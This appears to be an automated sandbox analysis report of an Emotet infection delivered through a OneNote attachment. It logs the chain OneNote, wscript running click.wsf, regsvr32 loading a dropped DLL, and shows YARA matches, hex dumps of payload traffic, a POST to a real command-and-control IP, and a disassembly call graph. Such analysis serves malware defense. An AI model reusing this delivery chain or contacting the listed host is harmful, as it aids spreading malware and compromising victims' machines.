                                                                                              2023-03-17 08:16:38 UTC264INData Raw: 6d 1c ee 6c 90 a0 3c 1d c8 07 11 54 99 49 4b a7 c3 af 75 56 dc a8 34 48 b2 27 1c fe ce 9b ca 11 16 51 23 be 01 24 43 2e 12 48 b6 6e 06 e9 04 34 b8 78 31 c0 9d f9 9c c8 f1 c0 55 cb 79 3f b2 17 1c d2 41 c6 2d bd 16 89 53 0d 44 53 a3 26 ca ce de ea 9b 67 c8 16 9a f5 04 d7 ca 7b 37 68 f7 64 f6 99 57 48 33 e3 2e a7 09 df 35 7a d2 53 e2 da b1 59 28 ac 20 46 58 42 71 62 c0 06 4a cc bc 78 3c 15 b7 a7 b1 54 2e bc 3d 49 33 e9 2e 7f 25 ef 70 dd d8 73 ea de 19 a8 d7 94 a2 7c 48 5b 78 62 41 82 50 03 7f 13 79 2e 37 e1 75 56 3a 07 43 20 ba 27 1c 81 14 13 a5 99 7d ad ce 72 33 bb 50 40 9a c6 f8 6e 06 90 bd 43 35 f5 34 0f a4 f5 c3 97 78 aa 89 c3 41 3f f2 8f 29 4d ea 21 42 f3 16 c9 82 72 33 d1 f6 6b 65 f8 52 5c 75 e3 34 34 dc 79 71 78 b7 1c 4b e1 75 d2 96 07 43 df b7 62 6b
                                                                                              Data Ascii: ml<TIKuV4H'Q#$C.Hn4x1Uy?A-SDS&g{7hdWH3.5zSY( FXBqbJx<T.=I3.%ps|H[xbAPy.7uV:C '}r3P@nC54xA?)M!Br3keR\u44yqxKuCbk
                                                                                              2023-03-17 08:16:38 UTC272INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC272INData Raw: 34 30 30 30 0d 0a 61 2c bc 32 63 6e c0 fe 4b d6 07 69 65 39 87 e8 39 62 41 aa db 89 8e 87 fb 1c 24 01 f6 21 51 83 51 50 38 e3 2e 18 a6 3e ca 85 d2 6b 5d 8c fe dd aa ea 10 21 77 e7 cc e4 86 06 15 e2 c6 78 3c d8 79 48 48 f3 ae bd 8e 08 33 62 6b c1 0c 44 36 fb 26 06 34 53 4d 53 a3 2e 45 b2 7a 33 99 11 32 bc ca 3c f8 7d 7c 26 3c 68 78 a4 91 4d b0 99 32 62 6b b8 3a af 35 7a ba ad b8 c8 bb 94 6d 4b 75 60 3f 2b c9 e7 51 01 3d ff 3c 58 cb b8 84 ed 20 63 59 69 fe 99 da 61 a1 c1 88 61 bc 37 73 e7 28 17 4c d2 65 4b 85 49 49 db f0 17 61 f8 33 00 81 bf 79 41 0f f1 30 21 d0 07 2c 2d 3d 62 6b c1 0c 7c 31 f1 1e 3e b2 d6 6f 99 f9 82 66 f3 fe c2 75 eb 0c 5b f4 19 69 7e bd 2c 24 89 e2 22 51 85 71 60 48 20 6b 00 a0 01 1d 74 d2 63 6d a2 9b 53 28 ea 10 11 46 88 e7 72 86 06 05
                                                                                              Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk|1>ofu[i~,$"Qq`H ktcmS(Fr
                                                                                              2023-03-17 08:16:38 UTC280INData Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17
                                                                                              Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
                                                                                              2023-03-17 08:16:38 UTC288INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC288INData Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb
                                                                                              Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                              2023-03-17 08:16:38 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                              Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                              2023-03-17 08:16:38 UTC304INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                              Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349687182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-03-17 08:17:34 UTC310OUTPOST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Length: 0
                                                                                              Host: 182.162.143.56
                                                                                              2023-03-17 08:17:36 UTC310INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Fri, 17 Mar 2023 08:16:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2023-03-17 08:17:36 UTC310INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:09:16:08
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one
                                                                                              Imagebase:0xc40000
                                                                                              File size:1676072 bytes
                                                                                              MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:09:16:33
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                              Imagebase:0x1260000
                                                                                              File size:147456 bytes
                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:09:16:38
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
                                                                                              Imagebase:0xac0000
                                                                                              File size:20992 bytes
                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:09:16:38
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"
                                                                                              Imagebase:0x7ff758390000
                                                                                              File size:24064 bytes
                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:12
                                                                                              Start time:09:16:40
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"
                                                                                              Imagebase:0x7ff758390000
                                                                                              File size:24064 bytes
                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.5%
                                                                                                Dynamic/Decrypted Code Coverage:8.9%
                                                                                                Signature Coverage:7.1%
                                                                                                Total number of Nodes:282
                                                                                                Total number of Limit Nodes:8
                                                                                                execution_graph 8532 f44214 8533 f44256 8532->8533 8536 f53988 8533->8536 8535 f444c6 8538 f53a29 8536->8538 8537 f53acc CreateProcessW 8537->8535 8538->8537 8539 180001138 8540 180001141 __scrt_acquire_startup_lock 8539->8540 8542 180001145 8540->8542 8543 1800063cc 8540->8543 8544 1800063ec 8543->8544 8545 180006403 8543->8545 8546 1800063f4 8544->8546 8547 18000640a 8544->8547 8545->8542 8604 1800086f4 8546->8604 8574 180009cd8 8547->8574 8559 180006481 8562 1800086f4 __std_exception_copy 11 API calls 8559->8562 8560 180006499 8561 1800061a4 47 API calls 8560->8561 8567 1800064b5 8561->8567 8563 180006486 8562->8563 8610 18000878c 8563->8610 8565 1800064bb 8566 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8565->8566 8566->8545 8567->8565 8568 1800064e7 8567->8568 8569 180006500 8567->8569 8570 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8568->8570 8571 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8569->8571 8572 1800064f0 8570->8572 8571->8565 8573 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8572->8573 8573->8545 8575 18000640f 8574->8575 8576 180009ce5 8574->8576 8580 1800093bc GetModuleFileNameW 8575->8580 8616 180007e8c 8576->8616 8581 180009401 GetLastError 8580->8581 8582 180009415 8580->8582 8974 180008668 8581->8974 8583 1800091fc 47 API calls 8582->8583 8585 180009443 8583->8585 8590 180009454 8585->8590 8979 18000a5f0 8585->8979 8586 18000940e 8587 1800010b0 _log10_special 8 API calls 8586->8587 8589 180006426 8587->8589 8592 1800061a4 8589->8592 8982 1800092a0 8590->8982 8594 1800061e2 8592->8594 8596 18000624e 8594->8596 8996 18000a088 8594->8996 8595 18000633f 8598 18000636c 8595->8598 8596->8595 8597 18000a088 47 API calls 8596->8597 8597->8596 8599 180006384 8598->8599 8603 1800063bc 8598->8603 8600 180008714 __std_exception_copy 11 API calls 8599->8600 8599->8603 8601 1800063b2 8600->8601 8602 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8601->8602 8602->8603 8603->8559 8603->8560 8605 180007f30 __std_exception_copy 11 API calls 8604->8605 8606 1800063f9 8605->8606 8607 1800085b8 8606->8607 9000 180008450 8607->9000 8611 180008791 HeapFree 8610->8611 8612 1800087c0 8610->8612 8611->8612 8613 1800087ac GetLastError 8611->8613 8612->8545 8614 1800087b9 Concurrency::details::SchedulerProxy::DeleteThis 8613->8614 8615 1800086f4 __std_exception_copy 9 API calls 8614->8615 8615->8612 8617 180007eb8 FlsSetValue 8616->8617 8618 180007e9d FlsGetValue 8616->8618 8620 180007eaa 8617->8620 8621 180007ec5 8617->8621 8619 180007eb2 8618->8619 8618->8620 8619->8617 8624 180007eb0 8620->8624 8671 180006e28 8620->8671 8659 180008714 8621->8659 8636 1800099b0 8624->8636 8627 180007ef2 FlsSetValue 8630 180007efe FlsSetValue 8627->8630 8631 180007f10 8627->8631 8628 180007ee2 FlsSetValue 8629 180007eeb 8628->8629 8633 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8629->8633 8630->8629 8666 180007b24 8631->8666 8633->8620 8799 180009c20 8636->8799 8638 1800099e5 8814 1800096b0 8638->8814 8642 180009a13 8643 180009a1b 8642->8643 8645 180009a2a 8642->8645 8644 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8643->8644 8656 180009a02 8644->8656 8645->8645 8828 180009d54 8645->8828 8648 180009b26 8650 1800086f4 __std_exception_copy 11 API calls 8648->8650 8649 180009b40 8653 180009b81 8649->8653 8657 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8649->8657 8651 180009b2b 8650->8651 8652 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8651->8652 8652->8656 8654 180009be8 8653->8654 8839 1800094e0 8653->8839 8655 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8654->8655 8655->8656 8656->8575 8657->8653 8660 180008725 __std_exception_copy 8659->8660 8661 180008776 8660->8661 8662 18000875a RtlAllocateHeap 8660->8662 8680 18000abf8 8660->8680 8664 1800086f4 __std_exception_copy 10 API calls 8661->8664 8662->8660 8663 180007ed4 8662->8663 8663->8627 8663->8628 8664->8663 8689 1800079fc 8666->8689 8703 18000acb8 8671->8703 8683 18000ac38 8680->8683 8688 180008160 EnterCriticalSection 8683->8688 8701 180008160 EnterCriticalSection 8689->8701 8737 18000ac70 8703->8737 8742 180008160 EnterCriticalSection 8737->8742 8800 180009c43 8799->8800 8802 180009c4d 8800->8802 8854 180008160 EnterCriticalSection 8800->8854 8803 180009cbf 8802->8803 8806 180006e28 __CxxCallCatchBlock 47 API calls 8802->8806 8803->8638 8807 180009cd7 8806->8807 8809 180009d2a 8807->8809 8811 180007e8c 52 API calls 8807->8811 8809->8638 8812 180009d14 8811->8812 8813 1800099b0 67 API calls 8812->8813 8813->8809 8855 1800091fc 8814->8855 8817 1800096e2 8819 1800096f7 8817->8819 8820 1800096e7 GetACP 8817->8820 8818 1800096d0 GetOEMCP 8818->8819 8819->8656 8821 18000b4c4 8819->8821 8820->8819 8822 18000b50f 8821->8822 8826 18000b4d3 __std_exception_copy 8821->8826 8824 1800086f4 __std_exception_copy 11 API calls 8822->8824 8823 18000b4f6 HeapAlloc 8825 18000b50d 8823->8825 8823->8826 8824->8825 8825->8642 8826->8822 8826->8823 8827 18000abf8 __std_exception_copy 2 API calls 8826->8827 8827->8826 8829 1800096b0 49 API calls 8828->8829 8830 180009d81 8829->8830 8831 180009ed7 8830->8831 8833 180009dbe IsValidCodePage 8830->8833 8838 180009dd8 __CxxCallCatchBlock 8830->8838 8832 1800010b0 _log10_special 8 API calls 8831->8832 8834 180009b1d 8832->8834 8833->8831 8835 180009dcf 8833->8835 8834->8648 8834->8649 8836 180009dfe GetCPInfo 8835->8836 8835->8838 8836->8831 8836->8838 8887 1800097c8 8838->8887 8973 180008160 EnterCriticalSection 8839->8973 8856 18000921b 8855->8856 8857 180009220 8855->8857 8856->8817 8856->8818 8857->8856 8858 180007db8 __CxxCallCatchBlock 47 API calls 8857->8858 8859 18000923b 8858->8859 8863 18000b524 8859->8863 8864 18000b539 8863->8864 8865 18000925e 8863->8865 8864->8865 8871 18000bfb4 8864->8871 8867 18000b590 8865->8867 8868 18000b5a5 8867->8868 8869 18000b5b8 8867->8869 8868->8869 8884 180009d38 8868->8884 8869->8856 8872 180007db8 __CxxCallCatchBlock 47 API calls 8871->8872 8873 18000bfc3 8872->8873 8874 18000c00e 8873->8874 8883 180008160 EnterCriticalSection 8873->8883 8874->8865 8885 180007db8 __CxxCallCatchBlock 47 API calls 8884->8885 8886 180009d41 8885->8886 8888 180009805 GetCPInfo 8887->8888 8889 1800098fb 8887->8889 8888->8889 8890 180009818 8888->8890 8891 1800010b0 _log10_special 8 API calls 8889->8891 8898 18000caa4 8890->8898 8893 18000999a 8891->8893 8893->8831 8899 1800091fc 47 API calls 8898->8899 8900 18000cae6 8899->8900 8918 18000a0c4 8900->8918 8919 18000a0cd MultiByteToWideChar 8918->8919 8975 180007f30 __std_exception_copy 11 API calls 8974->8975 8976 180008675 Concurrency::details::SchedulerProxy::DeleteThis 8975->8976 8977 180007f30 __std_exception_copy 11 API calls 8976->8977 8978 180008697 8977->8978 8978->8586 8980 18000a3dc 5 API calls 8979->8980 8981 18000a610 8980->8981 8981->8590 8983 1800092df 8982->8983 8985 1800092c4 8982->8985 8984 1800092e4 8983->8984 8986 18000a154 WideCharToMultiByte 8983->8986 8984->8985 8988 1800086f4 __std_exception_copy 11 API calls 8984->8988 8985->8586 8987 18000933b 8986->8987 8987->8984 8989 180009342 GetLastError 8987->8989 8990 18000936d 8987->8990 8988->8985 8991 180008668 11 API calls 8989->8991 8993 18000a154 WideCharToMultiByte 8990->8993 8992 18000934f 8991->8992 8994 1800086f4 __std_exception_copy 11 API calls 8992->8994 8995 180009394 8993->8995 8994->8985 8995->8985 8995->8989 8997 18000a014 8996->8997 8998 1800091fc 47 API calls 8997->8998 8999 18000a038 8998->8999 8999->8594 9001 18000847b 9000->9001 9008 1800084ec 9001->9008 9004 1800084da 9004->8545 9005 1800084c5 9005->9004 9007 180006ef0 _invalid_parameter_noinfo 47 API calls 9005->9007 9007->9004 9033 180008234 9008->9033 9012 1800084a2 9012->9005 9018 180006ef0 9012->9018 9019 180006f48 9018->9019 9020 180006eff GetLastError 9018->9020 9019->9005 9021 180006f14 9020->9021 9022 180007ff8 _invalid_parameter_noinfo 16 API calls 9021->9022 9023 180006f2e SetLastError 9022->9023 9023->9019 9024 180006f51 9023->9024 9025 180006e28 __CxxCallCatchBlock 45 API calls 9024->9025 9026 180006f56 9025->9026 9027 180006ef0 _invalid_parameter_noinfo 45 API calls 9026->9027 9028 180006f77 9027->9028 9063 18000b558 9028->9063 9034 18000828b 9033->9034 9035 180008250 GetLastError 9033->9035 9034->9012 9039 1800082a0 9034->9039 9036 180008260 9035->9036 9046 180007ff8 9036->9046 9040 1800082d4 9039->9040 9041 1800082bc GetLastError SetLastError 9039->9041 9040->9012 9042 1800085d8 IsProcessorFeaturePresent 9040->9042 9041->9040 9043 1800085eb 9042->9043 9044 1800082ec __CxxCallCatchBlock 14 API calls 9043->9044 9045 180008606 GetCurrentProcess TerminateProcess 9044->9045 9047 180008032 FlsSetValue 9046->9047 9048 180008017 FlsGetValue 9046->9048 9049 180008024 SetLastError 9047->9049 9051 18000803f 9047->9051 9048->9049 9050 18000802c 9048->9050 9049->9034 9050->9047 9052 180008714 __std_exception_copy 11 API calls 9051->9052 9053 18000804e 9052->9053 9054 18000806c FlsSetValue 9053->9054 9055 18000805c FlsSetValue 9053->9055 9056 180008078 FlsSetValue 9054->9056 9057 18000808a 9054->9057 9058 180008065 9055->9058 9056->9058 9059 180007b24 __std_exception_copy 11 API calls 9057->9059 9060 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9058->9060 9061 180008092 9059->9061 9060->9049 9062 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9061->9062 9062->9049 9064 18000b571 9063->9064 9065 180006f9f 9063->9065 9064->9065 9066 18000bfb4 _invalid_parameter_noinfo 47 API calls 9064->9066 9067 18000b5c4 9065->9067 9066->9065 9068 180006faf 9067->9068 9069 18000b5dd 9067->9069 9068->9005 9069->9068 9070 180009d38 _invalid_parameter_noinfo 47 API calls 9069->9070 9070->9068 9071 f480cc 9073 f480f3 9071->9073 9072 f482ba 9073->9072 9075 f5e9e8 9073->9075 9078 f48bc8 9075->9078 9077 f5eab4 9077->9073 9080 f48c02 9078->9080 9079 f48eb8 9079->9077 9080->9079 9081 f48d6f Process32FirstW 9080->9081 9081->9080 9082 180010a8e ExitProcess 9085 180014c90 LoadStringW LoadStringW 9082->9085 9094 1800109d0 LoadCursorW RegisterClassExW 9085->9094 9087 180014cec 9095 180010910 CreateWindowExW 9087->9095 9089 180014d02 GetMessageW 9090 180010ab3 9089->9090 9091 180014d19 TranslateAcceleratorW 9089->9091 9092 180014cfa 9091->9092 9093 180014d2f TranslateMessage DispatchMessageW 9091->9093 9092->9089 9092->9090 9093->9092 9094->9087 9096 1800109a1 ShowWindow UpdateWindow 9095->9096 9097 18001099d 9095->9097 9096->9097 9097->9092 9098 ef0000 9101 ef015a 9098->9101 9099 ef033f GetNativeSystemInfo 9100 ef0377 VirtualAlloc 9099->9100 9104 ef08eb 9099->9104 9102 ef0395 VirtualAlloc 9100->9102 9107 ef03aa 9100->9107 9101->9099 9101->9104 9102->9107 9103 ef0873 9103->9104 9105 ef08c6 RtlAddFunctionTable 9103->9105 9105->9104 9106 ef084b VirtualProtect 9106->9107 9107->9103 9107->9106

                                                                                                Executed Functions

                                                                                                Function 00EF0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
